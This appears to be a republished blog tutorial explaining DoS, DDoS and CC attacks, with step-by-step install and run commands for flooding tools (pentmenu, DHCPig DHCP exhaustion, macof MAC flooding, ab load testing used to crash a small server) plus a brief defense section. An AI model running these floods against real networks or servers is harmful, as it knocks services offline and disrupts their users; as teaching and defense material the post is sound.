DDoS and CC attack principle explanation and test demonstration

Enterprise 2023-04-10 01:55:05 views: null

DDoS and CC attacks

Article directory

Introduction

Denial Of Service 拒绝服务攻击
DOS攻击 == 耗尽资源攻击
DDOS == 分布式攻击

Purpose of DDoS attack

1.商业恶性竞争
2.勒索敲诈
3.实施报复

Attack Type Introduction

attack name target
TCP SYN flood attack web server
CC attack web server
UDO flood various servers
ICMP flood various servers
Dhcp flooding DHCP server
Mac flooding switch

Examples of DDoS and CC attacks

1. Pentmenu

流量泛洪攻击

Principle: The software will always send traffic packets to the target address, making its network congested and resources exhausted.

#软件
pentmenu
#功能
包含大部分 Flooding攻击模块
#使用kali
#从github上克隆需要的工具
git clone https://github.com/GinjaChris/pentmenu
#进入并且启动工具
cd pentmenu && ./pentmenu

www.linuxhy.top/www.hyithack.com

#进入后选择第二个选项DOS

www.linuxhy.top/www.hyithack.com

`可以选择相应的服务进行攻击`
2.DHCPig

局域网&内网攻击工具

Principle: Exhaust the addresses in the LAN & Intranet, making it impossible to access the Internet within an hour.

#软件
dhcpig
#功能
DHCP flood攻击
#下载并且安装插件
git clone https://github.com/secdev/scapy
解压scapy-master.zip并进入
python setup.py install 安装
##下载并且安装工具
git clone https://github.com/kamorin/DHCPig
解压:dhcpig-master.zip并进入解压目录
python setup.install 安装
#使用方法 
pig.py eth0
3.MacOf

交换机MAC地址泛洪

Principle: 20,000 MAC addresses of the attack target switch will be occupied in one second

#软件
macof
#功能
MAC flood(攻击)
#插件
scapy
#下载并且安装插件
git clone https://github.com/secdev/scapy
解压scapy-master.zip并进入
python setup.py install 安装
#下载工具
git clone https://github.com/whitewinterwolf/macof.py
#使用方法
python macof.py -i eth0
4.Ab

网站压力测试工具

Principle: The ab command will create multiple concurrent access threads, simulating multiple visitors to visit a certain URL address at the same time.

#软件
ab
#功能
CC攻击与网页压力测试,kali基本自带
#使用方法
ab -c 10 -n 100 https://x.x.x.x
#参数
-n:在测试会话中所有执行的请求个数,默认时,仅执行一个请求.
-c:一次产生的请求个数,默认是一次一个.
-t:测试锁进行的最大秒数.

#测试
ab -c 1000 -n 1000 -t 100 https://www.xxxx.com/
实测,1核2G服务器,直接可以打死,CPU直线飙升至百分之百

Defense DDoS method

DDoS是目前最凶猛,最难防御的网络攻击之一.
现实情况是,这个世界级难题还没有完美的,彻底的解决办法.
1. Network equipment and facilities
1.扩充带宽硬抗.
2.使用硬件防火墙.
3.选择高性能设备.
2. Effective anti-DDoS ideas and solutions
1.服务器负载均衡
2.CDN流量清洗
3. Prevention first
1.筛查系统漏洞
2.过滤不必要的服务和端口
3.系统资源优化

Summarize

更多技术文章,请访问 www.linuxhy.top 技术分享吧,详细学习!!!

Guess you like

Origin blog.csdn.net/HYXRX/article/details/120269132
Recommended
Ranking
Empire cms smart tag calls four first-level recommended articles, starting from the fourth article
Linux environment installation and configuration Elasticsearch7.17
Big Data processing architecture and Lambda Kappa architecture
Explore the top of the AI large model platform - Wenxin Qianfan
Beijing car PK10 lucky airship Guanya size and value of the odd and even tips
W3B x Sui Hacker House|In-depth understanding of Sui and Move language
Know almost Ko Chan: Chinese what any decent open source software products? (Finishing from my original answer)
Comprehensively improve AD domain security authentication | Zhuyun IDaaS
Android Update Engine Analysis (24) What happened when making the downgrade package?
Spark Architecture and Operating Mechanism (1) - System Architecture
Daily
More
2024-05-07(34)
2024-05-06(6)
2024-05-05(0)
2024-05-04(18)
2024-05-03(8)
2024-05-02(0)
2024-05-01(4)
2024-04-30(36)
2024-04-29(5)
2024-04-28(12)

Code World

© 2018 codetd.com